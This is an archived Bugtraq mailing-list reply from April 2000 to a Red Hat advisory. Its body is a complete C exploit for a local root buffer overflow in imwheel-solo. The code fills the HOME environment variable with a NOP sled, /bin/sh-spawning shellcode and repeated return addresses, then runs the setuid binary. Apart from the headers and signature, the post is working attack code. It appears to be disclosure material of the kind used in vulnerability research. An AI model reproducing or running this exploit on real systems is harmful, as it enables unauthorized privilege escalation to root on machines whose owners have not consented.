[14657] in bugtraq
Re: [RHSA-2000:016-02] [...] exploit
daemon@ATHENA.MIT.EDU (Janusz Niewiadomski)
Tue Apr 25 21:47:02 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.4.21.0004252040420.22515-100000@kris.top.pl>
Date: Tue, 25 Apr 2000 20:44:50 +0200
Reply-To: Janusz Niewiadomski <funkysh@KRIS.TOP.PL>
From: Janusz Niewiadomski <funkysh@KRIS.TOP.PL>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <200004211945.PAA08885@lacrosse.corp.redhat.com>
/*
* imwheel local root exploit [ RHSA-2000:016-02 ]
* funkysh 04/2000 funkysh@kris.top.pl
*/
#include <stdlib.h>
#include <stdio.h>
#define BUFFER 2070
#define NOP 0x90
#define PATH "/usr/X11R6/bin/imwheel-solo"
char code[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46"
"\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
"\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long getesp(void) { __asm__("movl %esp,%eax"); }
int main(int argc, char *argv[])
{
int i, offset = 0;
char buf[BUFFER];
long address;
if(argc > 1) offset = atoi(argv[1]);
address = getesp() + 1000 + offset;
memset(buf,NOP,BUFFER);
memcpy(buf+(BUFFER-300),code,strlen(code));
for(i=(BUFFER-250);i<BUFFER;i+=4)
*(int *)&buf[i]=address;
setenv("DISPLAY", "DUPA", 1);
setenv("HOME", buf, 1);
execl(PATH, PATH, 0);
}
--
[funkysh@kris.top.pl funkysh@poz.supermedia.pl]
16 A6 A1 D8 AA 8F 85 3C 61 A3 14 49 E8 78 ED A1
